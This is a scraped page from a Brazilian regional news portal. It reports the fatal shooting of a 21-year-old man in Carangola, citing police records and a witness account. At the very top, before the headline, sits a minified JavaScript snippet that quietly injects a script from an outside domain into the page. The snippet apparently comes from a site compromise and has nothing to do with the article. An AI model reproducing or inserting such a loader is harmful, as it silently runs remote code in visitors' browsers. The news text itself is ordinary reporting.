;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jovem de 21 anos morto a tiros em Carangola. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Jovem de 21 anos morto a tiros em Carangola.

Mais um assassinato foi registrado na região. No fim da noite desta quinta-feira (19), um jovem de 21 anos foi morto com três tiros. Segundo a Polícia Militar (PM), Bruno Bergone Valério Rodrigues cumpria pena em regime semiaberto no presídio local, por tráfico de drogas.

De acordo com o boletim de ocorrência (BO) da PM, ligações via 190 informavam sobre tiros disparados em uma rua do bairro caixa D’água, e já no local, após militares encontrarem uma bicicleta caída no chão e marcas de sague, uma testemunha contou que ouviu som de tiros e em seguida viu um rapaz correndo pela rua.

Segundo o registro policial, os militares seguiram o rastro de sangue e encontraram Bruno caído em um terreno, com ferimentos nas costas e aparentemente já sem vida, o que foi confirmado na sequência pelo Samu.

Ainda conforme a PM, a perícia da Polícia Civil (PC) constatou duas perfurações nas costas e uma em um dos ombros da vítima, bem como recolheu um projetil que atingiu o muro de uma residência.

Consta no BO que familiares da vítima afirmaram que Bruno havia sido ameaçado recentemente por um homem, que de acordo com a PM, é apontado como autor de um assassinato e suspeito por tráfico de drogas.

O corpo do jovem foi encaminhado ao IML de Muriaé e o crime será investigado pela equipe da delegacia de Polícia Civil em Carangola.

Bruno Bergone V. Rodrigues (21) foi executado no fim da noite desta quinta (19) - (Foto: reprodução/facebook)
Bruno Bergone V. Rodrigues (21) foi executado no fim da noite desta quinta (19) – (Foto: reprodução/facebook)

Fonte : Radio Muriaé/Polícia Militar

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.